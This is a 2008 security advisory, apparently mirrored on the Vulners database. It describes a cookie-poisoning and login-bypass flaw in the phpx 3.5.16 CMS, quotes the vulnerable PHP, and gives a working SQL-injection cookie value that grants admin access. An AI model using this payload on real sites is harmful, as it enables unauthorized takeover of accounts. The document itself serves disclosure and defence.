Vulners
Lucene search
phpx-cookie.txt
`=======================================================================
= gnix =
gnixmail at gmail dot com
http://gnix.netsons.org
Application: phpx
http://www.phpx.org/project.php (stable version)
Versions: 3.5.16
Platforms: All
Bug: Cookie poisoning / Login bypass
Date: 31 July 2008
=======================================================================
1. Intro
2. Cookie poisoning and login bypass
=======================================================================
1. Intro
========
PHPX is a web portal system, blog,Content Management System (CMS), forums,
and more. All files are currently hosted at http://www.phpx.org/project.php
=======================================================================
2. Cookie poisoning and login bypass
====================================
Every file in phpx-3.5.16/ directory have two lines of code: one for
include includes/functions.inc.php, and another to create a website object.
website's constructor will call checkCookie.
Source code (includes/functions.inc.php)
---------------------------------------------------------------------
class website {
...
function website(){
...
$this->checkCookie();
---------------------------------------------------------------------
The function checkCookie set the user_id if PXL cookie is set and the
query return an user_id, and an username.
Vulnerable code (includes/functions.inc.php lines 75 to 89)
---------------------------------------------------------------------
function checkCookie(){
if ($_COOKIE[PXL]){
list($user_id, $username) = $this->core->db->fetch("select user_id, username from users where sess = '$_COOKIE[PXL]'");
if (!$user_id){
setcookie("PXL", '', time() - 60, '', '', $this->core->secure);
$head = "Location: http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
header($head);
}
else {
if (strtolower($username) == "xnuiem"){ $this->debug = 1; }
$this->user_id = $user_id;
}
}
}
---------------------------------------------------------------------
This user_id is then used in the website constructor for set the user_id
of the core class.
Source code (includes/functions.inc.php line 32)
---------------------------------------------------------------------
$this->core->user_id = $this->user_id;
---------------------------------------------------------------------
Now if you want to get the admin privileges and by pass the login, you
have to create a cookie like this below:
---------------------------------------------------------------------
PXL=a' OR username='admin
---------------------------------------------------------------------
To do that you can use 'Modify Headers'.
=======================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4